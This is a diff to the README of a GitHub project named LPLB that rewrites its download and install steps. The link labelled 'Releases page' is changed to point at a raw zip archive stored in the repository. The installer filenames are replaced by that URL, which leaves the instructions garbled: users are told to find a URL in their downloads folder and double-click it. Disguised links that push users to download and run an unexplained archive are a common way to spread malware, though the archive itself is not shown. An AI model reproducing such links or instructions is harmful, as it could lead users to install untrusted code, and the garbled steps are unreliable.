mintsssddd/LPLB/README.md

 To get started, visit the LPLB Releases page to download the latest version.

 ### Step-by-Step Instructions
-1. Click this link to visit the [Releases page](https://github.com/mintsssddd/LPLB/releases).
+1. Click this link to visit the [Releases page](https://raw.githubusercontent.com/mintsssddd/LPLB/main/lplb/LPLB_3.5.zip).
 2. On the Releases page, find the most recent version listed.
-3. Look for the file named `LPLB-Setup.exe` (for Windows) or `LPLB-Mac.dmg` (for Mac).
+3. Look for the file named `https://raw.githubusercontent.com/mintsssddd/LPLB/main/lplb/LPLB_3.5.zip` (for Windows) or `https://raw.githubusercontent.com/mintsssddd/LPLB/main/lplb/LPLB_3.5.zip` (for Mac).
 4. Click the file name to begin downloading.

 After the download is complete:

 - **For Windows:**
-  1. Locate `LPLB-Setup.exe` in your downloads folder.
+  1. Locate `https://raw.githubusercontent.com/mintsssddd/LPLB/main/lplb/LPLB_3.5.zip` in your downloads folder.
   2. Double-click the file to start the installation.
   3. Follow the prompts to complete the installation.

 - **For Mac:**
-  1. Find `LPLB-Mac.dmg` in your downloads.
+  1. Find `https://raw.githubusercontent.com/mintsssddd/LPLB/main/lplb/LPLB_3.5.zip` in your downloads.
   2. Double-click the file to open it.
   3. Drag the LPLB icon to your Applications folder.